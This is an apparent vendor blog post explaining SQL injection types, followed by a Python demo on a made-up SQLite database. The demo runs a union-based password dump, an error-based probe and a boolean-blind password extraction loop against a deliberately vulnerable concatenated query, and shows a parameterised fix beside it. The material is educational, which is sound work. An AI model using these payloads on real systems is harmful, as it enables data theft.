Your SQL got the I(njection)

We’ve talked about it before, right? Or am I the only one having a déjà vu? Or an SQL injection?

No one likes doctors, or needles, or, well, anything that requires leaving the safety of your home.

Speaking of doctors, needles and things we hate, let’s talk about one of the most common and dangerous attacks out there: SQLi, or in other words, SQL Injection.


But wait, what is SQL? And why does it sound like a math exercise that will probably hurt me?

SQL

SQL stands for Structured Query Language, the standard language for talking to relational databases.

SQL is the most common language for accessing and manipulating databases (that sounds bad, so let’s say “managing” instead, shall we?).

There are several SQL dialects (MySQL, PostgreSQL, Microsoft SQL Server, Oracle and others), which we’ll talk about later on, but all of them support the same core statements and commands in order to stay uniform and compliant with the ANSI/ISO SQL standard. The differences still matter to an attacker: the exact payload that works (comment syntax, sleep functions, the wording of error messages) depends on the dialect behind the application.

SQL is a domain-specific language designed for managing data held in a relational database management system (RDBMS), or for stream processing in a relational data stream management system (RDSMS).

We use it mainly to handle structured data, that is, data incorporating relations among entities and variables.

What we can do with SQL:

  • We can execute queries against a database, which is how every other item on this list is performed.
  • We can use SQL to retrieve data from a database.
  • We can use SQL to insert, update and delete records in a database.
  • We can create databases, tables and other objects using SQL.

All of that is exactly what an attacker would love to do with your database too, which brings us to the point.

What is an SQL Injection (SQLi)?

Now, as mentioned before, all injection attacks work in the same way: the attacker supplies crafted input, the platform or system processes it “thinking” it is plain data, but part of that input is interpreted as code, which can lead to many unwanted results. In the case of SQL injection, the “code” is SQL, and it gets there because the application builds its query by gluing user input into the query text.

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application sends to its database. Usually that means the attacker can view data they are not supposed to see, let alone retrieve: data belonging to other users, to administrators, or any other data the application itself has access to.

In many cases, an attacker can also modify or delete this data, causing persistent and immediate changes that affect the application’s content or behavior.

There are several types of SQL injection. The first and last are “in-band” (the result comes back in the page itself); the middle two are “blind” (the attacker never sees query output directly and has to infer it):

  • Union-based SQLi – an injection technique that takes advantage of the UNION operator to append the results of an attacker-chosen SELECT to the results of the application’s own SELECT, so the extra rows are returned as part of the normal HTTP response. The injected SELECT has to return the same number of columns, with compatible types, as the original one, which is why attackers first probe for the column count.
  • Time-based SQLi – this type of injection relies on sending a query that makes the database wait for a set period of time (usually a few seconds; SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in Microsoft SQL Server) only when an attacker-chosen condition is TRUE. No data is returned, but the response time tells the attacker whether the condition evaluated to TRUE or FALSE, and by chaining many such conditions they can extract data one character at a time.
Example of a Time Based SQLi payload
  • Boolean-based SQLi – also known as “content-based”. Similar to time-based, but the signal is the page content rather than the delay: the injected condition makes the application return a different response (or the same one) depending on whether it evaluated to TRUE or FALSE. Again the attacker learns only one bit per request, but that is enough to reconstruct data the database never displays.
Example of a Boolean Based SQLi payload
  • Error-based SQLi – this type of injection relies on payloads that “split” the original query and generate an SQL error on the server side. When the application echoes that error into the page, it confirms the injection, reveals the database type and version, and with crafted payloads the error message itself can be made to carry query results. The payloads usually consist of characters, words or commands that break SQL syntax, starting with the classic single quote.
“Cause and Effect”, Example of an Error Based SQLi payload
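To make the mechanism from the previous paragraphs and three of the four types above concrete, here is an added example that is not part of the original post and not Kayran’s code. It runs against an in-memory SQLite database filled with constructed sample data (the tables, users and passwords are made up for illustration), using a deliberately vulnerable query built by string concatenation next to its parameterised fix. It shows a union-based dump of another table, error-based detection via the leaked database error, and boolean-based blind extraction of a password using only the “did the page show products or not” signal. SQLite has no sleep function, so time-based injection is not demonstrated; on MySQL the same loop would work with SLEEP() and a timer instead of the row check.

```python
import sqlite3
import string


def make_db():
    """Constructed sample data standing in for a shop's backend (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES (1, 'Gift Card', 'Gifts', 1),
                                    (2, 'Mug', 'Gifts', 1),
                                    (3, 'Unreleased Toy', 'Toys', 0);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t-pw'), (2, 'carlos', 'hunter2');
    """)
    return conn


def products_vulnerable(conn, category):
    """Deliberately VULNERABLE: the user-controlled category is concatenated into
    the SQL text, so a quote in the input changes the structure of the query."""
    sql = ("SELECT name, category FROM products "
           "WHERE category = '" + category + "' AND released = 1")
    return conn.execute(sql).fetchall()


def products_safe(conn, category):
    """Fixed version: a parameterised query. The driver passes the value separately
    from the statement, so it is always treated as data, never as SQL."""
    sql = "SELECT name, category FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()


# Union-based payload: closes the string, appends a SELECT with the same number
# of columns (2) and comments out the rest of the original query, so the users
# table comes back in the normal response.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users--"


def error_based_probe(conn, category):
    """Error-based detection: returns the database error text that the vulnerable
    query produces for this input, or None if the query ran cleanly."""
    try:
        products_vulnerable(conn, category)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def boolean_blind_extract(conn, target_user, max_len=32):
    """Boolean-based (blind) extraction: nothing from the users table is ever
    displayed. We only observe whether the page lists products (TRUE) or comes
    back empty (FALSE) and use that one bit per request to recover the password
    character by character."""
    recovered = ""
    # Candidate characters; the single quote is skipped because it would break the
    # probe payload itself (a real attacker would compare against CHAR()/hex instead).
    alphabet = (string.ascii_letters + string.digits + string.punctuation).replace("'", "")
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (f"Gifts' AND (SELECT substr(password,{pos},1) FROM users "
                       f"WHERE username='{target_user}') = '{ch}'--")
            if products_vulnerable(conn, payload):  # rows returned -> condition TRUE
                recovered += ch
                break
        else:
            break  # no candidate matched: we have passed the end of the password
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal request:          ", products_safe(db, "Gifts"))
    print("union dump (vulnerable): ", products_vulnerable(db, UNION_PAYLOAD))
    print("same payload, safe query:", products_safe(db, UNION_PAYLOAD))
    print("error-based probe:       ", error_based_probe(db, "Gifts'"))
    print("blind extraction:        ", boolean_blind_extract(db, "admin"))
```

Run it as-is and compare the two functions: the parameterised `products_safe` treats the UNION payload as a category name that happens not to exist and returns nothing, while `products_vulnerable` hands back every username and password. The blind loop is slow by design (one request per candidate character) but needs no output from the query at all, which is exactly why blind injection is so often missed by people who only look for error messages.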

Detecting and exploiting SQL injections has become relatively easy thanks to some magnificent automated tools such as Kayran. Keep in mind that the same kind of automation is available to attackers, which is exactly why you want to find the injection points in your own application before they do.

So make sure you don’t forget to get tested, because everyone hates injections.

Stay safe, Choose Kayran.
